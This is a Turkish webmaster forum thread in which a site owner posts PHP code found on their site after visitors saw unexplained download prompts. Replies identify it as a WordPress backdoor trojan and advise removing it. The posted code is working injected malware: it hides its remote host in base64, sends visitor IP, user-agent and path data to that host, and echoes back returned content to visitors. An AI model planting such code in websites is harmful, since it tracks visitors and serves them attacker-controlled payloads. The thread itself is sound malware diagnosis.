0
Kayıt Ol

Bu kodun anlamı nedir ?

2

1.043

  • 27-05-2013, 14:23:54
    #1
    EgeBey
    EgeBey
    Merhaba arkadaşlar sabah siteme baktıgımda uzantısı belli olmayan bir dosya indirme istegi çıkıyordu karşıma biraz araştırdım ve bunun aşagıdaki kodla alakalı oldugunu gördüm.. bu kodun anlamı nedir arkadaşlar..

    <?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>
  • 27-05-2013, 14:45:17
    #2
    digiklan
    digiklan
    Bir çeşit sayaç kodu gibi duruyor.
    http://mbrowserstats.com/statH/stat.php adresine ziyaretçi bilgilerini gönderiyor.
  • 27-05-2013, 14:52:24
    #3
    maxitr
    maxitr
    http://mbrowserstats.com/statH/stat.php adresi ile veri alışverişi yapıyor.

    http://ninjafirewall.com/malware/ind...=2013-02-22.01 adresine bu bir "Code injected through a WordPress backdoor" yani wordpress arka kapısı diye nitelendirilen bir trojan.

    Adresi direkt kontrol edince http://botsvsbrowsers.com/ sitesine gidiyor.

    http://www.wjunction.com/16-webmaste...-pls-help.html adresinde yazanları yapınız.

    http://www.aytugakar.info/joomla-hab...ne-dikkat.html bu sayfayı okuyunuz.

    Bahsi geçen kodu tüm bulaşan sayfalardan temizleyiniz.

    Kolay gelsin.